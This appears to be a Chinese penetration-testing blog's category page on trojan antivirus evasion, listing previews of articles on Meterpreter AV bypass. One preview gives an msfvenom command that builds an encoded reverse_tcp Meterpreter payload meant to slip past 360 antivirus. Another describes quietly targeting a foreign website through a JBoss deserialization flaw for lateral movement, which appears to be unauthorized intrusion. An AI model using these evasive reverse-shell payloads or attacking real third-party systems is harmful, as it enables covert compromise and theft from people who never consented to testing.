木马免杀
文章平均质量分 93
木马免杀
渗透测试中心
擅长渗透测试、红蓝对抗、内网渗透、域渗透,漏洞复现和研究
展开
-
Metasploit+python生成免杀exe过360杀毒
Metasploit+python生成免杀exe过360杀毒1在kali下生成一个反弹的msf的python脚本,命令如下:msfvenom -p windows/meterpreter/reverse_tcp LPORT=443 LHOST=192.1681.102 -e x86/shikata_ga_nai -i 11 -f py -o /opt/bk.py2.拷贝出bk.p...原创 2017-04-29 19:04:00 · 53 阅读 · 0 评论 -
Meterpreter的免杀详解
0×01 静态检测与对抗1.静态分析原理简单的来说,就是通过特征码识别静态文件,杀软会扫描存在磁盘上的镜像文件,如果满足特征码,就识别为恶意软件。恶意软件匹配规则yara匹配恶意软件的时候就是用的这样的方式。通过特征来识别抓HASH工具QuarksPwDump,yara规则如下(查看源码)/* This Yara ruleset is under the GNU-GPL...原创 2018-08-16 03:05:00 · 1387 阅读 · 0 评论 -
Bypass AV meterpreter免杀技巧
0x01 meterpreter简介MetasploitFramework是一个缓冲区溢出测试使用的辅助工具,也可以说是一个漏洞利用和测试平台,它集成了各种平台上常见的溢出漏洞和流行的shellcode,并且不断更新,使得缓冲区溢出测试变的方便和简单。 需要说明的是meterpreter在漏洞利用成功后会发送第二阶段的代码和meterpreter服务器dll,所以在网络不稳定的情况下经常出现没...原创 2017-03-19 23:25:00 · 93 阅读 · 0 评论 -
记一次内网横向免杀测试
工具准备jexbossKali LinuxCS 4.3Windows杀软在线查询一Windows杀软在线查询二Windows杀软在线查询三fscan潮汐shellcode免杀LSTARCobaltStrike其他插件PEASS-ngPrintSpoofer外网打点1、为了练习内网横向,悄悄的盯上国外的站点2、发现jboss网站存在反序列化漏洞,是呀jexboss无法利用成功python jexb...原创 2023-02-15 13:13:00 · 3039 阅读 · 0 评论